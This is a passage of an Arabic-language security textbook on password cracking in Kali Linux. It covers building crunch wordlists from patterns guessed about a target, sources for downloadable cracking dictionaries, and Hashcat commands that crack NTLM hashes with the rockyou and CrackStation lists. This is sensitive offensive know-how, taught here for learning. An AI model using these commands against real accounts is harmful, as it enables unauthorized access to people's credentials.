‫ﻣن ھذا اﻟﻣﺛﺎل ﻧﺟد ان ‪ crunch‬ﻓﻲ اﻷﺳﺎس ﯾﺑدا ﻣﻊ ﺣرف واﺣد وھو‪ a‬ﺛم ﯾﺳﺗﻣر ﻣن ﺧﻼل ﺟﻣﯾﻊ اﻟﻣﺣﺎرف اﻟﻣﺳﺗﺧدﻣﺔ ﺣﺗﻰ ﯾﺻل اﻟﻰ‬
‫اﻟﺣرف ‪.zzz‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪378‬‬

‫ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ ﺳوف ﻧﺣﺎول إﻧﺷﺎء ﺑﻌض ﻣن اﻟﻘواﺋم اﻷﻛﺛر ﺗﻌﻘﯾدا ﺑﺎﺳﺗﺧدام اﻟﺧﯾﺎرات اﻟﻣﺗﺎﺣﺔ ﻣﻊ ‪ crunch‬ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻓﻲ ھذا اﻟﻣﺛﺎل اﺳﺗﺧدﻣﻧﺎ ﺧﺎﺻﯾﺔ ﺗﺣدد اﻷﺣرف اﻟﺗﻲ ﻧرﯾد ﺗﺷﻛﯾل اﻟﻘﺎﻣوس ﻣﻧﮭﺎ‪ ،‬واﻟﺗﻲ ﻛﺎﻧت ‪ .abcde1234‬واﻟﺗﻲ ﺳوف ﺗؤدى اﻟﻰ اﻧﺷﺎء‬
‫ﻣﻠف ﻛﻠﻣﺎت ﻋﺑﺎره ﻋن ﻛﻠﻣﺎت ﻣن ﺛﻼﺛﺔ ﻗﯾم وأرﺑﻌﺔ ﻗﯾم ﻣرﻛﺑﺔ ﻣن اﻷﺣرف اﻟﻣذﻛورة وﻓﻰ ﻣﺛﺎﻟﻧﺎ ھﻧﺎ ﻣﺛل ‪ aa1‬و‪ bb3‬و‪ .a212‬ﺣﯾث ﺗﺑدأ ب‬
‫‪ aaa‬وﺗﻧﺗﮭﻲ ب ‪.4444‬‬
‫ﯾﻣﻛﻧﻧﺎ أﯾﺿﺎ اﺳﺗﺧدام ﺧﺎﺻﯾﺔ ﺗﺣدد اﻷﺣرف ﻋن طرﯾﻖ اﻻﺳﺗﻌﺎﻧﺔ ﺑﺎﻟﻣﻠف ‪ charset.lst‬اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻣﻌظم اﻟﺗﺷﻛﯾﻼت اﻟﻣﻣﻛﻧﺔ ﻣن‬
‫اﻷﺣرف أو اﻻرﻗﺎم اﻟﺗﻲ ﻧرﯾد ﺑﮭﺎ ﺗﺷﻛﯾل اﻟﻘﺎﻣوس ﻣﻧﮭﺎ‪ ،‬وھذا اﻟﻣﻠف ﻣوﺟود ﻓﻲ اﻟﻣﺳﺎر ‪ /usr/share/crunch/‬ﻓﻧذﻛره ﻣﻊ ﻣﺳﺎره ﺛم اﺳم‬
‫اﻟﺗﺷﻛﯾﻠﺔ ﻋﻧد اﺳﺗﺧداﻣﮫ ﻣﻊ اﻟﺗطﺑﯾﻖ ‪ .crunch‬وﻟﻣﻌرﻓﺔ اﻟﺗﺷﻛﯾﻼت اﻟﻣﺗﺎﺣﺔ واﺳﻣﺎءھﺎ ﻧذھب إﻟﻰ اﻟﻣﻠف اﻟﻣذﻛور وﻧﺧﺗر ﻣﻧﮭﺎ ﻣﺎ ﻧرﯾد وﯾﻣﻛﻧك‬
‫أﯾﺿﺎ إﺿﺎﻓﺔ اﻟﺗﺷﻛﯾﻼت اﻟﺗﻲ ﺗرﯾدھﺎ ﻛﻣﺎ ذﻛرﻧﺎ ﻣن ﻗﺑل‪.‬‬

‫ﺣﯾث ﻗﻣﻧﺎ ﻓﻲ ھذا اﻟﻣﺛﺎل ﺑﺈﻧﺷﺎء ﻗواﺋم ﻛﻠﻣﺎت ﻣﻛون ﻣن ﺛﻼﺛﺔ ﻗﯾم اﻟﻰ أرﺑﻌﺔ ﻗﯾم ﻣرﻛﺑﮫ ﻣن اﻷﺣرف اﻟﻣذﻛورة ﻓﻲ اﻟﻣﻠف ‪ charset.lst‬ﺗﺣت‬
‫ﺑﻧد ‪ hex-lower‬واﻟﺗﻲ ﺗﻌﻧﻰ اﻟﻘﯾم اﻷﺗﯾﺔ ‪ 0123456789abcdef‬ﺣﯾث ﺗﺑدأ ﻗﺎﺋﻣﺔ اﻟﻛﻠﻣﺎت ب ‪ 000‬وﺗﻧﺗﮭﻲ ب ‪.ffff‬‬

‫اﯾﺿﺎ ﺗﺳﺗطﯾﻊ ﻋﻣل ﻗﺎﻣوس ﺑﺧﺎﻧﺎت ﻣﻌﻠوﻣﺔ ﻣﺳﺑﻘﺎ ﺑواﺳطﺔ اﻟﺧﯾﺎر ‪ t‬ﻣﺛﻼ ارﯾد ﻗﺎﻣوس ﯾﺣﺗوي ﻋﻠﻰ ﺧﻣس ﺧﺎﻧﺎت ﺗﻛون اﻟﺧﺎﻧﺔ اﻟﺛﺎﻧﯾﺔ واﻟﺛﺎﻟﺛﺔ‬
‫واﻟراﺑﻌﺔ ﻣﻌﻠوﻣﺔ واﻟﺑﻘﯾﮫ ﻏﯾر ﻣﻌﻠوﻣﺔ ﻋن طرﯾﻖ ﻛﺗﺎﺑﺗﮭﺎ ﺑﺎﻟﺻﯾﻐﺔ اﻟﺗﺎﻟﯾﺔ ‪ %123%‬ﺟﻣﯾﻊ اﻟﺧﺎﻧﺎت ﻏﯾر ﻣﻌروﻓﮫ ﻣﺎ ﻋدا اﻟﺗﻲ ﻗﻣﻧﺎ ﺑﻛﺗﺎﺑﺗﮭﺎ‪.‬‬
‫وﯾﺟب ان ﻧﻧﺗﺑﮫ ﺣﯾث اﻧﮫ ﻣﻊ ھذا اﻟﺧﯾﺎر ﯾﺳﺗﺧدم ﺑﻌض اﻟﺗﻌﺑﯾرات اﻟﻣﺣددة ﻛﺎﻻﺗﻰ‪:‬‬
‫ﺣﯾث ﯾرﻣز إﻟﻰ اﻟﺣرف اﻟﺻﻐﯾر ﺑﺎﻟرﻣز"@" وإﻟﻰ اﻟﺣرف اﻟﻛﺑﯾر ﺑﺎﻟرﻣز"‪ ",‬وإﻟﻰ اﻟرﻗم ﺑﺎﻟرﻣز "‪ "%‬وإﻟﻰ اﻟرﻣوز ‪ symbols‬ﺑﺎﻟرﻣز "^"‬
‫‪@: Inserts lowercase characters‬‬
‫‪%: Inserts numbers‬‬
‫‪,: Inserts uppercase characters‬‬
‫‪^: Inserts symbols‬‬
‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻓﺈﻧﻧﺎ ﻧﻔﺗرض أﻧﻧﺎ ﻧﻌرف اﺳﺗﺧداﻣﺎت ھدﻓﻧﺎ ﺣﯾث ﯾﺳﺗﺧدم اﻟﻛﻠﻣﺔ ‪ pass‬وﻟﻛن ﺗﻠﯾﮭﺎ اﺛﻧﯾن ﻣن اﻟﻘﯾم اﻟﻐﯾر اﻟﻣﻌروﻓﺔ ﻓﻲ ﻛﻠﻣﺔ‬
‫اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم‪ .‬ﻟﺗﺷﻐﯾل ‪ crunch‬ﻟﻌﻣل ﻗﺎﺋﻣﺔ ﺑﻛﻠﻣﺎت ﻣرور ﻋﺑﺎره ﻋن ﺳﺗﺔ أﺣرف وﺗﻛون ﻋﺑﺎره ﻋن ‪ pass‬ﺛم ﺗﻠﯾﮭﺎ اﺛﻧﯾن ﻣن اﻟﻘﯾم‬
‫اﻟﻣﺟﮭوﻟﺔ‪ ،‬وﯾﺗم ذﻟك ﻋن طرﯾﻖ اﺳﺗﺧدم‪ %%‬ﻟﺗﻣﺛﯾل أي رﻗم‪ .‬ﻟﺗﺷﻐﯾل ھذا ووﺿﻊ اﻟﻧﺎﺗﺞ ﻓﻲ ﻣﻠف ﻧﺻﻲ ﯾدﻋﻰ ‪ ،newpasslist.txt‬ﻛﺎﻻﺗﻰ‪:‬‬
‫‪#crunch 6 6 –t pass%% -o newpasslist.txt‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪379‬‬

‫ﺳوف ﯾﺣﺗوي اﻟﻣﻠف ﻧﺻﻲ اﻟﻧﺎﺗﺞ ﻣن اﻻﻣر ‪ crunch‬ﻛﺎﻓﺔ اﻟﺗرﻛﯾﺑﺎت اﻟﻣﻣﻛﻧﺔ‪ .‬ﺗظﮭر اﻟﺻورة اﻟﺗﺎﻟﯾﺔ اﻟﺟزء اﻟﻌﻠوي ﻣن ﻣﻠف اﻹﺧراج‪:‬‬

‫ﻣﻼﺣظﺔ‪ :‬اﻟﺧﯾﺎر ‪ t‬ﻻ ﯾﺳﺗﺧدم اﻻ ﻋﻧد اﺧﺗﯾﺎر ﺧﺎﻧﺎت ﺛﺎﺑﺗﮫ ﻣﺛل ﺧﻣس ﺧﺎﻧﺎت او ﻋﺷر ﺧﺎﻧﺎت او ﺳﺑﻊ ﺧﺎﻧﺎت ﻟﯾس ﻣن واﺣد اﻟﻰ ﺳﺑﻌﮫ اي‬
‫ﺗﻛون ﺟﻣﯾﻌﮭﺎ ﺳﺑﻊ ﺧﺎﻧﺎت ﻻ ﯾﺑدا ﻣن ﺧﺎﻧﮫ ﺻﻐرى أﺻﻐر ﻣن اﻟﻣذﻛورة ﻓﻲ اﻟﺧﯾﺎر ‪.t‬‬

‫‪Download Wordlists from the Web‬‬


‫إذا ﻛﺎن أي ﻣن اﻟﻣﻌﻠوﻣﺎت اﻟواردة أﻋﻼه ﻟم ﺗﺳﺎﻋدك ﻓﻲ اﻟﺧروج ﺑﺎﻟﻘﺎﺋﻣﺔ اﻟﺗﻲ ﺗرﯾدھﺎ أو ﻛﻧت ﺗرﯾد اﻟﻣزﯾد ﻣن ﻗواﺋم اﻟﻛﻠﻣﺎت‪ ،‬ﯾﻣﻛﻧك أﯾﺿﺎ‬
‫ﺗﺣﻣﯾﻠﮭﺎ ﻣن ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ ،‬ﻻﺳﺗﺧداﻣﮭﺎ ﻓﻲ ﻛﺎﻟﻲ‪ .‬اﺛﻧﯾن ﻣن أﻓﺿل اﻟﻣواﻗﻊ اﻟﺗﻲ رأﯾﺗﮭﺎ ھﻲ ‪Skull Security‬و‪.CrackStation‬‬
‫‪Skull Security:‬‬
‫‪https://wiki.skullsecurity.org/Passwords‬‬
‫‪CrackStation:‬‬
‫‪https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm‬‬

‫)‪Hashcat and oclHashcat (Password Cracking with CUDA‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪380‬‬

‫اﻟﻣﺻدر‪http://hashcat.net/wiki :‬‬
‫ﺣﺗﻰ اﻵن ﻗﻣﻧﺎ ﺑﺗﻐطﯾﺔ اﻟﻌدﯾد ﻣن اﻟﺗﻘﻧﯾﺎت ﻟﻣﮭﺎﺟﻣﺔ ﻛﻠﻣﺎت اﻟﻣرور‪ .‬رأﯾﻧﺎ أﻧﮫ ﻓﻲ ﺑﻌض اﻷﺣﯾﺎن ﻣﺎ ﯾﻣﻛﻧك أن ﺗﻔﻌﻠﮫ ﺑﻣﺟرد اﻟﺑﺣث ﻓﻲ‬
‫‪ ،rainbow table‬وﻓﻲ ﺑﻌض اﻟﺣﺎﻻت ﯾﻣﻛﻧك ﺗﻣرﯾر اﻟﮭﺎش )‪.(pass the hash‬‬
‫وﻟﻛن اﻟﻛﺛﯾر ﯾﻌﺎﻧﻲ ﻣن ﻋﻣﻠﯾﺔ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور واﻟﻣﺷﺎﻛل اﻟﻛﺛﯾرة اﻣﺎ ﻟﺻﻌوﺑﺔ اﻟﻛﻠﻣﺔ او أن ﻋﻣﻠﯾﺔ اﻟﻛﺳر ﺑطﯾﺋﺔ او اﻟﻛﺛﯾر ﻣن اﻷﺳﺑﺎب‬
‫اﻷﺧرى‪ .‬ﻟذﻟك ﺳﻧﺗطرق اﻟﯾوم اﻟﻰ اﺣدى اﻟطرق اﻟﻣﺗﻘدﻣﺔ ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور واﻟﺗﻲ ﺗﺟﻌل اﻟﻛﺳر أﺳﮭل وأﺳرع ﺑﻛﺛﯾر ﻣن اﻟطرق اﻟﺗﻘﻠﯾدﯾﺔ‬
‫واﻟﺗﻲ ﺗﺻل ﺳرﻋﺗﮭﺎ اﻟﻰ أﻛﺛر ﻣن ‪ 10‬ﻣﻠﯾون ﻣﺣﺎوﻟﺔ ﻓﻲ اﻟﺛﺎﻧﯾﺔ‪ .‬ﻟك ان ﺗﺗﺧﯾل ﺳرﻋﺗﮫ ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﻌﻘدة واﻟﺗﻲ ﺗﺻل ﻟﻌدة دﻗﺎﺋﻖ‬
‫ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺔ ‪ CUDA‬وﻟﻛن ﻣﺎ ﻣﻌﻧﻰ ‪CUDA‬؟‬
‫ھﻲ اﺧﺗﺻﺎر ل‪ Compute Unified Device Architecture‬ھﻲ ﻋﺑﺎرة ﻋن ﻣﻧﺻﺔ اﻟﺣوﺳﺑﺔ اﻟﻣﺗوازﯾﺔ اﻟﺗﻲ ﯾزﯾد أداء‬
‫اﻟﺣوﺳﺑﺔ ﻋن طرﯾﻖ ﺗﺳﺧﯾر ﻗوة ‪) GPU‬وﺣدات اﻟﻣﻌﺎﻟﺟﺔ ﻓﻲ ﻛروت اﻟﺷﺎﺷﺔ اﻟﺣدﯾﺛﺔ ﺗﺳرع ﻣن اﻟﻌﻣﻠﯾﺎت ﺑﺷﻛل ﻛﺑﯾر ﺗم ﺗطوﯾرھﺎ ﻋن طرﯾﻖ‬
‫ﺷرﻛﺔ ‪ .(NVidia‬وﻣﻊ ﻣرور اﻟوﻗت‪ ،‬ازداد ﻗوة اﻟﻣﻌﺎﻟﺟﺔ ‪ GPU‬ﺑﺷﻛل ﻛﺑﯾر ﻣﻣﺎ ﯾﺗﯾﺢ ﻟﻧﺎ اﻟﻘدرة ﻋﻠﻰ اﺳﺗﺧداﻣﮭﺎ ﻟﻸﻏراض اﻟﺣﺳﺎﺑﯾﺔ ﻟدﯾﻧﺎ‬
‫وﻟﻸﻏراض اﻟﻌرض اﻟﺗوﺿﯾﺣﻲ‪.‬‬
‫‪CUDA Cracking‬‬
‫ھﻲ ﻋﻣﻠﯾﺔ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﺑﺎﺳﺗﺧدام ﻣوارد ﻛﺎرت اﻟﺷﺎﺷﺔ وھﻲ أﺳرع ﻋﺷرات اﻷﺿﻌﺎف ﻣن ﺳرﻋﺔ ‪ .CPU‬ﯾﺟب ان ﯾدﻋم ﻛﺎرت اﻟﺷﺑﻛﺔ‬
‫ﻟدﯾك ﺗﻘﻧﯾﺔ ‪ CUDA‬أوﻻ‪ .‬ﻛﻠﻣﺎ ذاد ﻋدد ‪ CUDA cores‬ﻛﻠﻣﺎ ﻛﺎن اﻷداء اﻗوى وأﺳرع‪.‬‬
‫ﺳﻧﺳﺗﺧدم ﻓﻲ ھذا اﻟﺟزء اﻟﻌدﯾد ﻣن اﻷدوات اﻟﻣﻧدرﺟﺔ ﺟﻣﯾﻌﮭﺎ ﺗﺣت اﻷداة ‪ Hashcat‬ﻟﻧظﺎﻣﻲ اﻟﺗﺷﻐﯾل ﺳواء ﻟوﯾﻧدوز او ﻟﻠﯾﻧﻛس‪.‬‬

‫‪Hashcat and OclHashcat‬‬

‫‪ Hashcat‬و‪ oclHashcat‬ھﻲ ادوات ﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور واﻟﺗﻲ ﯾﻣﻛﻧﮭﺎ ﺗﺷﻐﯾل ﻛل ﻣن ﻣﻌﺎﻟﺞ ﺑطﺎﻗﺎت اﻟرﺳوم )‪ (GPU‬او وﺣدة اﻟﻣﻌﺎﻟﺟﺔ‬
‫اﻟﻣرﻛزﯾﺔ )‪ (CPU‬اﻟﺧﺎص ﺑك‪ OclHashcat .‬ھو ﻧﺳﺧﺔ ‪ GPGPUbased‬أي اﻟﺗﻲ ﺗﻌﺗﻣد ﻋﻠﻰ ﻣﻌﺎﻟﺞ ﺑطﺎﻗﺔ اﻟرﺳوم اﻟﺧﺎص ﺑك‬
‫)‪ (GPU‬وﻛﺎﻧت ﺗﺳﻣﻰ ھﻛذا ﻗدﯾﻣﺎ أﻣﺎ اﻻن ﻓﺄﺻﺑﺣت ﺗﺳﻣﻰ ‪OclHashcat-plus‬او ‪ CUDAHashcat-plus‬ﻋﻠﻰ ﺣﺳب ﻧوع ﻛﺎرت‬
‫اﻟﺷﺎﺷﺔ اﻟﻣﺳﺗﺧدم واﻟﺗﻲ ﺗﻛون اﺳرع ﺑﻛﺛﯾر ﻣن ‪ Hashcat‬اﻟذى ﯾﻌﺗﻣد ﻓﻘط ﻋﻠﻰ ‪ Hashcat/oclHashcat .CPU‬ھﻲ أدوات ﻣﺗﻌددة‬
‫اﻟﻌﻣﻠﯾﺎت )‪ (Multi Threating‬اﻟﺗﻲ ﯾﻣﻛﻧﮭﺎ اﻟﺗﻌﺎﻣل ﻣﻊ ھﺎش ﻣﺗﻌدد وﻗواﺋم ﻛﻠﻣﺎت ﻣﺗﻌددة ﺧﻼل ﺟﻠﺳﺔ ھﺟوم واﺣده‪ .‬وذﻟك ﻻن وﺣدة‬
‫اﻟﻣﻌﺎﻟﺟﺔ اﻟﻣرﻛزﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﯾﻣﻛﻧﮭﺎ ﺗﺷﻐﯾل اﻟﻌدﯾد ﻣن اﻟﻣواﺿﯾﻊ‪ ،‬واﻟﺗﻲ ﺳوف ﻧﺳﺗﺧدﻣﮭﺎ‪ .‬وﻟﻛن اﻟﺳرﻋﺔ اﻟﺣﻘﯾﻘﯾﺔ ﯾﺄﺗﻲ دوره ﻋﻧد اﺳﺗﺧدام‬
‫ﻗوة ‪ .GPU‬إذا ‪ GPU‬اﻟﺧﺎﺻﺔ ﺑك ﯾﻣﻛﻧﮭﺎ ﺗﺷﻐﯾل اﻟﻣﺋﺎت ﻣن اﻟﻣواﺿﯾﻊ‪ ،‬ﯾﺗم اﺳﺗﺧدام ﻛل ھذه اﻟﻘوة ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪ .‬ﯾﻣﻛﻧك ﺣﺗﻰ ﺗﺳﺧﯾر‬
‫ﻗوة وﺣدات ﻣﻌﺎﻟﺟﺔ اﻟرﺳوﻣﺎت ﻟﺑطﺎﻗﺎت ﻓﯾدﯾو ﻣﺗﻌددة ﻹﻧﺷﺎء ﻣﺣطﺔ ﻗوﯾﺔ ﺟدا ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‪.‬‬
‫‪ Hashcat/oclHashcat‬ﺗﻘدم اﻟﻌدﯾد ﻣن ﺧﯾﺎرات اﻟﮭﺟوم‪ ،‬ﻛﺎﻻﺗﻲ‪:‬‬

‫ﯾوﻓر ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ اﻟﻌدﯾد ﻣن إﺻدارات اﻠ‪ Hashcat‬واﻟﺗﻲ ﯾﻣﻛن اﻟوﺻول اﻟﯾﮭﺎ ﻣن ﺧﻼل اﻻﺗﻲ‪:‬‬

‫‪Applications | Kali Linux | Password Attacks | GPU Tools | oclhashcat-lite‬‬


‫‪Applications | Kali Linux | Password Attacks | GPU Tools | oclhashcat-plus‬‬
‫‪Applications | Kali Linux | Password Attacks | Offline Attacks| hashcat‬‬
‫‪Applications | Kali Linux | Password Attacks | Offline Attacks| oclhashcat-lite‬‬
‫‪Applications | Kali Linux | Password Attacks | Offline Attacks| oclhashcat- plus‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪381‬‬

‫ﻧﺣن اﻻن ﺳوف ﻧذھب ﻟﺗﺷﻐﯾل‪ ، Hashcat‬وﻟﻛﻧﻧﺎ ﺑﺣﺎﺟﺔ ﻟﻣﻌرﻓﺔ ﻋدد ﻗﻠﯾل ﻣن اﻷﺷﯾﺎء‪ .‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻟﻣﻌرﻓﺔ ﻣﺎ ﻧوع اﻟﮭﺎش اﻟذي ﻧﺳﺗﺧدﻣﮫ‪،‬‬
‫واﺳم اﻟﻣﻠف اﻟﮭﺎش‪ ،‬اﺳم ﻣﻠف اﻟﻘﺎﻣوس وأﺧﯾرا اﺳم اﻟﻣﻠف اﻟﻧﺎﺗﺞ ﻟﺗﺧزﯾن ﻧﺎﺗﺞ ﻛﺳر اﻟﮭﺎش ﺑﮫ‪.‬‬
‫ﯾﻣﻛﻧك ان ﺗرى اﻟﺧﯾﺎرات اﻟﻣﺧﺗﻠﻔﺔ ﻣن ﺧﻼل ﻓﺗﺢ ﻧﺎﻓذة اﻟﺗرﻣﻧﺎل وﻛﺗﺎﺑﺔ "‪."hashcat --help‬‬

‫دﻋوﻧﺎ اﻻن ﻧﻣﺿﻲ ﻗدﻣﺎ ﻣﻊ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ‪:‬‬


‫‪ -‬ﻧﻘوم ﺑﻔﺗﺢ اﻟﺗرﻣﻧﺎل ﺛم ﻛﺗﺎﺑﺔ اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#hashcat -m 1000 Easyhash.txt rockyou.txt -o cracked.txt‬‬
‫ﺣﯾث ﯾﺧﺑرﻧﺎ اﻟﺧﯾﺎر )‪ (-m 1000‬ان ﻧوع اﻟﮭﺎش اﻟذي ﻧرﯾد ﻓك ﺗﺷﻔﯾره ﻣن اﻟﻧوع ‪ ،NTLM‬اﻟﻣﻠف ‪ Easyhash.txt‬ﯾﺣﺗوي ﻋﻠﻰ اﻟﮭﺎش‬
‫اﻟذي ﻧرﯾد ﻓك ﺗﺷﻔﯾره‪ ،‬اﻟﻣﻠف ‪ rockyou.txt‬ﯾﺣﺗوي ﻋﻠﻰ ﻗواﺋم اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﺳوف ﻧﺳﺗﺧدﻣﮭﺎ ﻓﻲ ﻓك اﻟﺗﺷﻔﯾر‪ ،‬وأﺧﯾرا اﻟﻣﻠف ‪cracked.txt‬‬
‫اﻟذي ﯾﺄﺗﻲ ﺑﻌد اﻟﺧﯾﺎر )‪ (-o‬واﻟذي ﯾوﺿﻊ ﻓﯾﮫ ﻧﺎﺗﺞ ﻋﻣﻠﯾﺔ ﻓك اﻟﺗﺷﻔﯾر‪.‬‬
‫ﻣﻠﺣوظﮫ‪ :‬ﯾﺳﺗﺧدم اﻟﺧﯾﺎر )‪ (-m‬ﻓﻲ ﺗﺣدﯾد ﻧوع اﻟﮭﺎش واﻟﺧﯾﺎر )‪ (-a‬ﻟﺗﺣدﯾد ﻧوع اﻟﮭﺟوم اﻟذي ﺗرﯾد ان ﺗﺳﺗﺧدﻣﮫ ﻓﻼ ﻋﻣﻠﯾﺔ ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫ﻓﯾﻣﺎ ﯾزﯾد ﻗﻠﯾﻼ ﻋﻠﻰ اﻟﺛواﻧﻲ ﺳوف ﺗﺷﺎھد ھذا‪:‬‬ ‫‪-‬‬

‫ﻧﻘوم اﻻن ﺑﻔﺗﺢ ﻧﺎﺗﺞ اﻻﻣر ‪ hashcat‬واﻟذي ﺗم ﺗﺳﺟﯾﻠﮫ ﻓﻲ اﻟﻣﻠف ‪ cracked.txt‬ﻟﻧرى ﻣﺎ ﻗﺎﻣت ﺑﮫ اﻷداة ﻣن ﻛﺳر اﻟﮭﺎش‬ ‫‪-‬‬
‫وﺗرﺟﻣﺗﮫ اﻟﻰ ﻛﻠﻣﺔ ﻣرور ﻓﻲ ﻧص ﻏﯾر ﻣﺷﻔر‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪382‬‬

‫ﻛﻣﺎ ﺗرى‪ ،‬ﻓﻠﻘد ﺗم ﻛﺳر ‪ 13‬ﻛﻠﻣﺎت ﻣرور ﻓﻲ ﺣواﻟﻲ ﺛﺎﻧﯾﺔ وﻧﺻف‪ .‬ﻓﻠﻧﻠﻘﻲ ﻧظرة ﻓﺎﺣﺻﺔ ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﻣرور ھذه ﻧﺟدھﺎ ﻣن أﻛﺛر‬ ‫‪-‬‬
‫اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﺗم ﻛﺳرھﺎ ﻓﻲ ﻋﺎم ‪ .2012‬ﻋن طرﯾﻖ اﺳﺗﺧدام أي ﻣن ھذه اﻟﻛﻠﻣﺎت ﻓﺈﻧﮭﺎ ﻟن ﺗﺻﻣد أﻣﺎم أي أداة ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور‬
‫ﻷﻛﺛر ﻣن ﺟزء ﻣن اﻟﺛﺎﻧﯾﺔ‪.‬‬
‫دﻋوﻧﺎ ﻧﻠﻘﻲ ﻧظرة ﻋﻠﻰ ﺑﻌض ﻣن ﻛﻠﻣﺎت اﻟﺳر أﺻﻌب ﻣﻣﺎ ﺳﺑﻖ ﻣﻊ ‪ .Hashcat‬وﻟﯾﻛن ﻣﺛﻼ ﻣﺛل اﻻﺗﻲ‪:‬‬ ‫‪-‬‬

‫ﺛم ﻧﻘوم ﺑﺣﻔظﮭﺎ ﻓﻲ اﻟﻣﻠف ‪.hash.txt‬‬ ‫‪-‬‬


‫ﻧﻘوم اﻻن ﺑﻔﺗﺢ اﻟﺗرﻣﻧﺎل وﻛﺗﺎﺑﺔ اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬ ‫‪-‬‬
‫‪#hashcat -m 1000 hash.txt rockyou.txt -o hardcracked.txt‬‬
‫ﻓﯾﻣﺎ ﯾزﯾد ﻗﻠﯾﻼ ﻋﻠﻰ اﻟﺛواﻧﻲ ﺳوف ﺗﺷﺎھد ھذا‪:‬‬ ‫‪-‬‬

‫ﻧﻼﺣظ ھﻧﺎ اﻧﮭﺎ اﺧذت ﻣن اﻟوﻗت ﻣﻘدار ‪ 4‬ﺛواﻧﻲ‪ .‬وﻗﺎﻣت ﺑﻛﺳر اﺛﻧﯾن ﻣن اﻟﮭﺎش ﻓﻘط ﻣن أﺻل ﺧﻣﺳﮫ‪.‬‬ ‫‪-‬‬

‫‪ -‬ﻋﻧد ﻋدم اﻟﻧﺟﺎح ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻧﺣﺎول اﺳﺗﺧدام ﻣﻠف ﻗﺎﻣوس أﻛﺑر‪.‬‬
‫‪ -‬ﻓﻠﻧﺣﺎول ﺗﺣﻣﯾل ھذا اﻟﻘﺎﻣوس ﻣن اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ اﻟذي ﺳوف ﯾزﯾد ﻋن ‪ 5‬ﺟﯾﺟﺎ‪.‬‬
‫‪https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm‬‬
‫‪ -‬ﺛم ﻧﻔﺗﺢ اﻟﺗرﻣﻧﺎل وﻧﺳﺗﺧدم اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#hashcat -m 1000 hash.txt crackstation.txt -o hardcracked.txt --remove‬‬
‫ﻧﻼﺣظ ھﻧﺎ وﺟود ﺗﻐﯾرﯾن ﻋن اﻻﻣر اﻟﺳﺎﺑﻖ‪ ،‬أوﻻ ﻗﻣﻧﺎ ﺑﺗﻐﯾر اﻟﻘﺎﻣوس اﻟﻣﺳﺗﺧدم ﻣن ‪ rockyou.txt‬اﻟﻰ ‪ crackstation.txt‬اﻟذي ﻗﻣﻧﺎ‬
‫ﺑﺗﺣﻣﯾﻠﮫ‪ .‬ﺛﺎﻧﯾﺎ ﻗﻣﻧﺎ ﺑﺎﺳﺗﺧدام اﻟﺧﯾﺎر ‪ --remove‬وھذا اﻟﺧﯾﺎر ﯾﺳﺗﺧدم ﻣﻊ ﻣﻠﻔﺎت اﻟﻘﺎﻣوس اﻟﻌﻣﻼﻗﺔ ﺣﯾث اﻧﮫ ﺳوف ﯾزﯾل اﻟﻛﻠﻣﺎت اﻟﻣﻘﺎﺑﻠﺔ ﻟﻠﮭﺎش‬
‫اﻟدى ﺗم ﻛﺳره‪ ،‬ھذا اﻟﺧﯾﺎر ﻏﯾر ﻣﮭﻣﮫ ﻓﻲ ﻣﻠﻔﺎت اﻟﻘﺎﻣوس اﻟﺻﻐﯾرة‪.‬‬
‫‪ -‬ﻣﻊ ﺑﻌض ﻣن اﻟوﻗت ﺳوف ﯾﻛون اﻟﻧﺎﺗﺞ ﻛﺎﻻﺗﻰ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪383‬‬

